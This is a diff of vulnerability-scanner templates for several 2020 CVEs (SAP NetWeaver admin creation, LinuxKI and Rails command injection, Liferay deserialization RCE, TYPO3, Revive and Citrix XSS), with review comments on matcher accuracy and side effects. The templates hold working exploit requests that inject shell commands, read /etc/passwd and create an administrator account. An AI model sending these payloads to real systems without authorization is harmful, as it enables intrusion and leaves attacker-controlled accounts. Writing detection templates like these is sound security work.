||||
- type: word
|
||||
words:
|
||||
- "h3ll0_w0Rld"
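Review bot: the first request reads `/config/bigip.license`, but the regex `[a-fA-F]{5}-[a-fA-F]{5}-...` admits only the letters a to f, so a registration key containing digits or other letters never matches; widen the class or drop the license read, since `/etc/passwd` and `/etc/f5-release` already confirm the traversal. The second request block goes beyond detection: it aliases `list` to `bash`, writes `/tmp/nonexistent` through `fileSave.jsp`, executes it, and deletes the alias but never the file, so each scan leaves an artifact; that much state change needs a comment, and confirmed command execution is normally `critical`, not `high`.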
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2020-6287
|
||||
|
||||
info:
|
||||
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Affected Versions: 7.30, 7.31, 7.40, 7.50
|
||||
|
||||
# p.s:
|
||||
# > Don't forget to change the default credentials
|
||||
# > to create new admin in associated file:
|
||||
# > `payloads/CVE-2020-6287.xml`
|
||||
|
||||
# Ref:
|
||||
# - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
data: "payloads/CVE-2020-6287.xml"
|
||||
raw:
|
||||
- |
|
||||
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml; charset=UTF-8
|
||||
Connection: close
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('data')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "urn:CTCWebServiceSi"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
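Review bot: this request invokes `SPC_UserManagement.cproc` with the credentials from `payloads/CVE-2020-6287.xml`, that is, it creates an administrative user on the scanned system, and the `p.s` comment asks operators to edit that file first; a successful scan therefore leaves a new admin account behind. The matcher on `urn:CTCWebServiceSi` with a 200 only shows the servlet answered and cannot tell success from failure, so the template neither confirms the result nor cleans up; at minimum state the side effect at the top of the file rather than in a `p.s`, and prefer a check that does not need to create an account.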
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2020-7209
|
||||
|
||||
info:
|
||||
name: LinuxKI Toolset 6.01 Remote Command Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
|
||||
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
|
||||
|
||||
# https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d"
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "nonexistent"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
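Review bot: the oracle chosen for the `kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d` request is the decoded word `nonexistent`, an ordinary English word that an error page about a nonexistent pid or file could contain on its own, so the `words: - "nonexistent"` matcher can fire without the injected `echo | base64 -d` ever running; use a random, non-dictionary token as the base64 payload so a body match proves execution. The two `#` lines describing the `shell_exec` flaw read as the template's description and the GitHub commit link as its reference; putting them in `info.description` and a reference field keeps the explanation with the template metadata instead of in free comments.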
@ -0,0 +1,60 @@
|
|||
id: CVE-2020-7961
|
||||
|
||||
info:
|
||||
name: Liferay Portal Unauthenticated RCE
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Deserialization of Untrusted Data in
|
||||
# Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers
|
||||
# to execute arbitrary code via JSON web services (JSONWS).
|
||||
# -
|
||||
# References:
|
||||
# > https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
command:
|
||||
- "systeminfo" # Windows
|
||||
- "lsb_release -a" # Linux
|
||||
- "sysctl kern.ostype" # macOS
|
||||
port:
|
||||
- "80"
|
||||
- "443"
|
||||
- "8080"
|
||||
attack: sniper
|
||||
raw:
|
||||
- |
|
||||
POST /api/jsonws/invoke HTTP/1.1
|
||||
Host: {{Hostname}}:port
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
|
||||
Content-Length: 4938
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData
|
||||
X-Requested-With: XMLHttpRequest
|
||||
cmd2: command
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap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
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Microsoft Corporation"
|
||||
- "Distributor ID"
|
||||
- "kern.ostype"
|
||||
condition: or
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "Microsoft Windows (.*)"
|
||||
- "kern.ostype: (.*)"
|
||||
- "Distributor ID: (.*)"
|
|
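Review bot: the `port` payload list (80, 443, 8080) only rewrites the `Host: {{Hostname}}:port` header; the connection itself still goes to `{{BaseURL}}`, so the three values produce three requests to the same socket with different Host headers rather than probes of three ports, and the payload should be dropped (run the template against each base URL instead) unless a Host-header variation is actually intended. Two smaller points on the same raw request: `Accept-Encoding: gzip, deflate` is set explicitly, and Go's HTTP transport only transparently decompresses a gzipped reply when it added that header itself, so a compressed response would reach the `Microsoft Corporation` / `Distributor ID` / `kern.ostype` matchers and the regex extractors still compressed, which argues for removing the header; and `Content-Length: 4938` is hard-coded while the `cmd2: command` header and `Host` line vary per payload, so anyone replaying the raw request outside the engine should recompute it. Please also note in a comment that `command` and `port` appear as bare tokens while `{{Hostname}}` and `{{BaseURL}}` use braces, and that `attack: sniper` is being applied to two payload sets, so readers know which substitution and iteration behaviour the template relies on.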
@ -0,0 +1,24 @@
|
|||
id: CVE-2020-8091
|
||||
|
||||
info:
|
||||
name: TYPO3 Cross-Site Scripting Vulnerability
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(31337),this.x=1}//"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "31337"
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- "application/x-shockwave-flash"
|
||||
part: header
|
|
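Review bot: the second matcher requires `31337` in the response body, but the response to `/typo3/contrib/websvg/svg.swf?uniqueId=...` is the SWF binary itself (as the `application/x-shockwave-flash` header matcher confirms), which the server returns unchanged regardless of the query string because the `uniqueId` injection executes inside the Flash player on the client; with `matchers-condition: and` the template will therefore not fire on a vulnerable host. Drop the `31337` body matcher and rely on the 200 plus the Content-Type header, with a comment saying the template detects the presence of the vulnerable `svg.swf` file rather than observing reflection. An `info.description` line naming the affected component would also help, since the `name` only says "TYPO3 Cross-Site Scripting Vulnerability".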
@ -0,0 +1,20 @@
|
|||
id: CVE-2020-8115
|
||||
|
||||
info:
|
||||
name: Revive Adserver XSS
|
||||
author: madrobot & dwisiswant0
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- (?mi)window\.location\.replace\(".*alert\(1337\)
|
|
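Review bot: the path `{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\"` sends `"`, `'`, `(`, `)`, `;` and `,` raw in the query string; `"` in particular is not a valid URL character, and servers or proxies that reject or rewrite it would make the probe fail or behave differently from the browser PoC, so percent-encode the payload (`%22`, `%27`, `%28`, `%29`, `%3B`, `%2C`). The regex matcher `window\.location\.replace\(".*alert\(1337\)` is a good oracle because it ties the match to the reflection point rather than to `alert(1337)` appearing anywhere; the template only lacks an `info.description` line saying which `afr.php` parameter (`refresh`) is reflected into the `setTimeout` call.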
@ -0,0 +1,22 @@
|
|||
id: CVE-2020-8163
|
||||
|
||||
info:
|
||||
name: Potential Remote Code Execution on Rails
|
||||
author: tim_koopmans
|
||||
severity: high
|
||||
description: Tests for ability to pass user parameters as local variables into partials
|
||||
# reference: https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
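Review bot: the request goes to `{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23` with no path component, but the bug requires a controller action that passes request parameters as locals to a partial, which is rarely the application root, so the template should either take the vulnerable path as a variable or state in a comment that it must be pointed at that endpoint, otherwise a 200 from the home page with no match is reported as "not vulnerable" on an affected application. On the matcher, `root:[x*]:0:0:` is a character class matching a single `x` or `*`, so it matches the usual `root:x:0:0:` line but not a `root::0:0:` line with an empty password field; if that is intended, fine, but `root:[^:]*:0:0:` would cover both. The `# reference:` comment could become a proper reference field alongside `description`.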
@ -0,0 +1,33 @@
|
|||
id: CVE-2020-8191
|
||||
|
||||
info:
|
||||
name: Citrix ADC & NetScaler Gateway Reflected XSS
|
||||
# Leads to RCE
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /menu/stapp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Length: 96
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
X-NITRO-USER: xpyZxwy6
|
||||
|
||||
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</title><script>alert(31337)</script>"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
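Review bot: the declared `Content-Length: 96` does not match the body on the last line of the raw request, `sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot`, which is 90 bytes; the engine may recompute the length from the body it sends, but anyone replaying this raw request with another client will get a request that hangs waiting for six more bytes, so either remove the header and let the client set it or change it to 90. The `# Leads to RCE` comment under `name` is a claim without the conditions behind it (on its own the template proves a reflected XSS in `appname` on `/menu/stapp`), and would be better expressed as an `info.description` line that says what the XSS is and how it chains; the `</title><script>alert(31337)</script>` body matcher is sound since an HTML-encoded reflection would not match it.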
Some files were not shown because too many files have changed in this diff.